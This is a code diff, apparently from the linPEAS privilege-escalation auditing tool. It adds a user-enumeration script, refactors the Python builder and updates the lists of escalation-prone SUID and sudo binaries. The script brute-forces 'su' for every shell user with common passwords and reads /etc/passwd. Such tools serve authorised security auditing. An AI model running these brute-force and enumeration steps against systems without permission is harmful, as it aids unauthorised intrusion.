(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
echo ""
#-- UI) Superusers
print_2title "Superusers"
awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
echo ""
#-- UI) Users with console
print_2title "Users with console"
if [ "$MACPEAS" ]; then
dscl . list /Users | while read uname; do
ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
if grep -q "$ushell" /etc/shells; then #Shell user
dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
fi
done
else
no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
unexpected_shells=""
printf "%s\n" "$no_shells" | while read f; do
if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
unexpected_shells="$f\n$unexpected_shells"
fi
done
grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
if [ "$unexpected_shells" ]; then
printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
echo "Unexpected users with shells:"
printf "%s\n" "$unexpected_shells" | while read f; do
if [ "$f" ]; then
grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
fi
done
fi
fi
echo ""
#-- UI) All users & groups
print_2title "All users & groups"
if [ "$MACPEAS" ]; then
dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
else
cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
fi
echo ""
#-- UI) Login now
print_2title "Login now"
(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
#-- UI) Last logons
print_2title "Last logons"
(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
#-- UI) Login info
print_2title "Last time logon each user"
lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
EXISTS_FINGER="$(command -v finger 2>/dev/null)"
if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
dscl . list /Users | while read uname; do
ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
if grep -q "$ushell" /etc/shells; then #Shell user
finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
echo ""
fi
done
fi
echo ""
#-- UI) Password policy
print_2title "Password policy"
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
echo ""
if [ "$MACPEAS" ]; then
print_2title "Relevant last user info and user configs"
defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
echo ""
print_2title "Guest user status"
sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
echo ""
fi
#-- UI) Brute su
EXISTS_SUDO="$(command -v sudo 2>/dev/null)"
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then
print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
POSSIBE_SU_BRUTE=$(check_if_su_brute);
if [ "$POSSIBE_SU_BRUTE" ]; then
SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
printf "%s\n" "$SHELLUSERS" | while read u; do
echo " Bruteforcing user $u..."
su_brute_user_num "$u" $PASSTRY
done
else
printf $GREEN"It's not possible to brute-force su.\n\n"$NC
fi
else
print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC
fi
print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC

37
linPEAS/builder/src/linpeasBaseBuilder.py Normal file
View File

@ -0,0 +1,37 @@
from .yamlGlobals import (
LINPEAS_PARTS,
LINPEAS_BASE_PATH,
TEMPORARY_LINPEAS_BASE_PATH,
PEAS_CHECKS_MARKUP
)
class LinpeasBaseBuilder:
def __init__(self):
with open(LINPEAS_BASE_PATH, 'r') as file:
self.linpeas_base = file.read()
def build(self):
print("[+] Building temporary linpeas_base.sh...")
checks = []
for part in LINPEAS_PARTS:
name = part["name"]
assert name, f"Name not found in {part}"
name_check = part["name_check"]
assert name_check, f"Name not found in {name_check}"
file_path = part["file_path"]
assert file_path, f"Name not found in {file_path}"
with open(file_path, 'r') as file:
linpeas_part = file.read()
checks.append(name_check)
self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check};\n"
self.linpeas_base += f'print_title "{name}"\n'
self.linpeas_base += linpeas_part
self.linpeas_base += f"\nfi\necho ''\necho ''\n"
self.linpeas_base += 'if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi\n'
self.linpeas_base = self.linpeas_base.replace(PEAS_CHECKS_MARKUP, ",".join(checks))
with open(TEMPORARY_LINPEAS_BASE_PATH, "w") as f:
f.write(self.linpeas_base)

9
linPEAS/builder/src/linpeasBuilder.py
View File

@ -1,12 +1,13 @@
import re import re
import requests import requests
import base64 import base64
import os
from .peasLoaded import PEASLoaded from .peasLoaded import PEASLoaded
from .peassRecord import PEASRecord from .peassRecord import PEASRecord
from .fileRecord import FileRecord from .fileRecord import FileRecord
from .yamlGlobals import ( from .yamlGlobals import (
LINPEAS_BASE_PATH, TEMPORARY_LINPEAS_BASE_PATH,
PEAS_FINDS_MARKUP, PEAS_FINDS_MARKUP,
PEAS_STORAGES_MARKUP, PEAS_STORAGES_MARKUP,
PEAS_STORAGES_MARKUP, PEAS_STORAGES_MARKUP,
@ -38,7 +39,7 @@ class LinpeasBuilder:
self.bash_find_f_vars, self.bash_find_d_vars = set(), set() self.bash_find_f_vars, self.bash_find_d_vars = set(), set()
self.bash_storages = set() self.bash_storages = set()
self.__get_files_to_search() self.__get_files_to_search()
with open(LINPEAS_BASE_PATH, 'r') as file: with open(TEMPORARY_LINPEAS_BASE_PATH, 'r') as file:
self.linpeas_sh = file.read() self.linpeas_sh = file.read()
def build(self): def build(self):
@ -309,9 +310,13 @@ class LinpeasBuilder:
def __replace_mark(self, mark: str, find_calls: list, join_char: str): def __replace_mark(self, mark: str, find_calls: list, join_char: str):
"""Substitude the markup with the actual code""" """Substitude the markup with the actual code"""
self.linpeas_sh = self.linpeas_sh.replace(mark, join_char.join(find_calls)) #New line char is't needed self.linpeas_sh = self.linpeas_sh.replace(mark, join_char.join(find_calls)) #New line char is't needed
def write_linpeas(self, path): def write_linpeas(self, path):
"""Write on disk the final linpeas""" """Write on disk the final linpeas"""
with open(path, "w") as f: with open(path, "w") as f:
f.write(self.linpeas_sh) f.write(self.linpeas_sh)
os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file

50
linPEAS/builder/src/yamlGlobals.py
View File

@ -2,7 +2,54 @@ import os
import yaml import yaml
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__)) CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh"
LINPEAS_BASE_PARTS = CURRENT_DIR + "/../linpeas_parts"
LINPEAS_PARTS = [
{
"name": "System Information",
"name_check": "system_information",
"file_path": LINPEAS_BASE_PARTS + "/system_information.sh"
},
{
"name": "Container",
"name_check": "container",
"file_path": LINPEAS_BASE_PARTS + "/container.sh"
},
{
"name": "Available Software",
"name_check": "available_software",
"file_path": LINPEAS_BASE_PARTS + "/available_software.sh"
},
{
"name": "Processes, Crons, Timers, Services and Sockets",
"name_check": "procs_crons_timers_srvcs_sockets",
"file_path": LINPEAS_BASE_PARTS + "/procs_crons_timers_srvcs_sockets.sh"
},
{
"name": "Network Information",
"name_check": "network_information",
"file_path": LINPEAS_BASE_PARTS + "/network_information.sh"
},
{
"name": "Users Information",
"name_check": "users_information",
"file_path": LINPEAS_BASE_PARTS + "/users_information.sh"
},
{
"name": "Software Information",
"name_check": "software_information",
"file_path": LINPEAS_BASE_PARTS + "/software_information.sh"
},
{
"name": "Interesting Files",
"name_check": "interesting_files",
"file_path": LINPEAS_BASE_PARTS + "/interesting_files.sh"
}
]
LINPEAS_BASE_PATH = LINPEAS_BASE_PARTS + "/linpeas_base.sh"
TEMPORARY_LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh"
FINAL_LINPEAS_PATH = CURRENT_DIR + "/../../" + "linpeas.sh" FINAL_LINPEAS_PATH = CURRENT_DIR + "/../../" + "linpeas.sh"
YAML_NAME = "sensitive_files.yaml" YAML_NAME = "sensitive_files.yaml"
FILES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_NAME FILES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_NAME
@ -18,6 +65,7 @@ assert all(f in ROOT_FOLDER for f in COMMON_FILE_FOLDERS)
assert all(f in ROOT_FOLDER for f in COMMON_DIR_FOLDERS) assert all(f in ROOT_FOLDER for f in COMMON_DIR_FOLDERS)
PEAS_CHECKS_MARKUP = YAML_LOADED["peas_checks"]
PEAS_FINDS_MARKUP = YAML_LOADED["peas_finds_markup"] PEAS_FINDS_MARKUP = YAML_LOADED["peas_finds_markup"]
FIND_LINE_MARKUP = YAML_LOADED["find_line_markup"] FIND_LINE_MARKUP = YAML_LOADED["find_line_markup"]
FIND_TEMPLATE = YAML_LOADED["find_template"] FIND_TEMPLATE = YAML_LOADED["find_template"]

402
linPEAS/linpeas.sh
View File

@ -56,7 +56,7 @@ NOTEXPORT=""
DISCOVERY="" DISCOVERY=""
PORTS="" PORTS=""
QUIET="" QUIET=""
CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" CHECKS="system_information,container,available_software,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files"
WAIT="" WAIT=""
PASSWORD="" PASSWORD=""
NOCOLOR="" NOCOLOR=""
@ -77,7 +77,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user,
${YELLOW}-N${BLUE} Do not use colours ${YELLOW}-N${BLUE} Do not use colours
${YELLOW}-v${BLUE} Verbose execution ${YELLOW}-v${BLUE} Verbose execution
${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. ${YELLOW}-o${BLUE} Only execute selected checks (system_information,container,available_software,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files). Select a comma separated list.
${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-L${BLUE} Force linpeas execution.
${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution.
${YELLOW}-d <IP/NETMASK>${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 ${YELLOW}-d <IP/NETMASK>${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24
@ -365,8 +365,8 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\
/xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\
/xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)"
#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' #To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|'
sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$' sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genisoimage$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$'
sidVB2='/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' sidVB2='/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$'
cfuncs='file|free|main|more|read|split|write' cfuncs='file|free|main|more|read|split|write'
sudoVB1=" \*|env_keep\+=LD_PRELOAD|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ash$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mount$" sudoVB1=" \*|env_keep\+=LD_PRELOAD|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ash$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mount$"
@ -1086,144 +1086,145 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil
CONT_THREADS=0 CONT_THREADS=0
# FIND ALL KNOWN INTERESTING SOFTWARE FILES # FIND ALL KNOWN INTERESTING SOFTWARE FILES
FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"system.d\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"system.d\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
